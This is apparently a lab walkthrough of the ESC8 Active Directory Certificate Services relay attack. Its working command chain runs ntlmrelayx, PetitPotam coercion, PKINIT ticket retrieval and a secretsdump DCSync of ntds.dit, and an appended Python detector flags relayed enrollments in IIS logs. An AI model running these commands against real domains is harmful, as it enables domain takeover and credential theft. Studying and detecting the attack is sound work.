# ESC8 - coerce to domain admin

Active Directory Certificate Services (AD CS) is the Windows Server® role (here on Windows Server 2012) that lets you build a public key infrastructure (PKI) and provide public key cryptography, digital certificates, and digital signature capabilities for your organization.

PetitPotam is a classic NTLM relay attack, and such attacks have been previously documented by Microsoft along with numerous mitigation options to protect customers. For example: [Microsoft Security Advisory 974926](https://docs.microsoft.com/security-updates/SecurityAdvisories/2009/974926).

* To make this attack work we will need:
  * AD CS running on the domain with web enrollment enabled.
  * A working coercion method (here we use PetitPotam unauthenticated, but an authenticated PrinterBug or any other coercion method works the same way).
  * A template usable for ESC8; one exists by default in Active Directory, named *DomainController*.
* Let’s check that web enrollment is up and running at: <http://192.168.56.23/certsrv/certfnsh.asp>

<figure><img src="/files/B1pPLcNZUDO3N2IJtB7E" alt=""><figcaption></figcaption></figure>

* Add a listener to relay SMB authentication to HTTP with impacket ntlmrelayx

```
sudo ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
```

<figure><img src="/files/LvkZVJ9pOryxakNEkDFg" alt=""><figcaption></figcaption></figure>

* Launch the coercion with [PetitPotam](https://github.com/topotam/PetitPotam) unauthenticated (this no longer works against an up-to-date Active Directory, but authenticated coercion methods work the same way)

```
python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local
```


<figure><img src="/files/uuHMJLgz2QnqWe1oJ71p" alt=""><figcaption></figcaption></figure>

* ntlmrelayx relays the authentication to the web enrollment endpoint and obtains the certificate

<figure><img src="/files/Qeq4U0J0jNbkCRtTYRMJ" alt=""><figcaption></figcaption></figure>

* Ask for a TGT with the certificate we just got (we copied it to the file cert.b64)
* Download gettgtpkinit.py from PKINITtools here: <https://raw.githubusercontent.com/dirkjanm/PKINITtools/master/gettgtpkinit.py>

```
python3 gettgtpkinit.py -pfx-base64 $(cat cert.b64) 'maryland.local'/'baltimore$' 'baltimore.ccache'
```

<figure><img src="/files/YlxwB38eEXQuSqDZzge0" alt=""><figcaption></figcaption></figure>

* Now that we have a TGT for baltimore$, we can run a DCSync and dump the whole ntds.dit content.

```
export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
```

<figure><img src="/files/NQmmqf5su21YtTIJsXX7" alt=""><figcaption></figcaption></figure>
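As an added detection-side example (not part of the original page), the following Python parses a constructed IIS W3C log excerpt from the web enrollment server and flags the two conditions the chain above relies on: NTLM authentication to /certsrv arriving over plain HTTP (so no TLS channel binding / Extended Protection), and a machine account enrolling from an address other than its own host. The log lines, the 192.168.56.50 source address and the host-to-IP inventory are assumptions.

```python
from typing import Dict, List

# Constructed IIS W3C log excerpt from the web enrollment server (sample data,
# not from the page). Field order is the IIS default: date time s-ip cs-method
# cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-05-01 10:00:01 192.168.56.23 GET /certsrv/certfnsh.asp - 80 - 192.168.56.50 Mozilla/5.0 401
2024-05-01 10:00:02 192.168.56.23 POST /certsrv/certfnsh.asp - 80 MARYLAND\\baltimore$ 192.168.56.50 Mozilla/5.0 200
2024-05-01 10:05:00 192.168.56.23 POST /certsrv/certfnsh.asp - 443 MARYLAND\\jdoe 192.168.56.40 Mozilla/5.0 200
2024-05-01 10:06:00 192.168.56.23 POST /certsrv/certfnsh.asp - 443 MARYLAND\\ws01$ 192.168.56.60 Mozilla/5.0 200
"""

# Hypothetical inventory: the address each machine account is expected to
# enrol from (in practice built from DNS or the CMDB).
EXPECTED_HOST_IP: Dict[str, str] = {
    "MARYLAND\\baltimore$": "192.168.56.31",
    "MARYLAND\\ws01$": "192.168.56.60",
}

def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Turn a W3C log into dicts keyed by the names in the #Fields directive."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def esc8_findings(text: str, expected_ip: Dict[str, str]) -> List[str]:
    """Flag enrolment requests that look like relayed machine-account auth."""
    findings: List[str] = []
    for r in parse_w3c(text):
        if not r["cs-uri-stem"].lower().startswith("/certsrv/"):
            continue
        user, src, port = r["cs-username"], r["c-ip"], r["s-port"]
        if user == "-":
            continue  # unauthenticated 401 challenge, nothing to attribute yet
        if port == "80":  # NTLM over plain HTTP: no TLS, so no channel binding / EPA
            findings.append(f"plain-HTTP auth to {r['cs-uri-stem']} by {user} from {src}")
        if user.endswith("$") and expected_ip.get(user) not in (None, src):
            findings.append(f"machine account {user} enrolled from {src}, expected {expected_ip[user]}")
    return findings
```

Run against the sample, the relayed baltimore$ request triggers both findings while the user enrolment and the workstation enrolling from its own address produce none.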
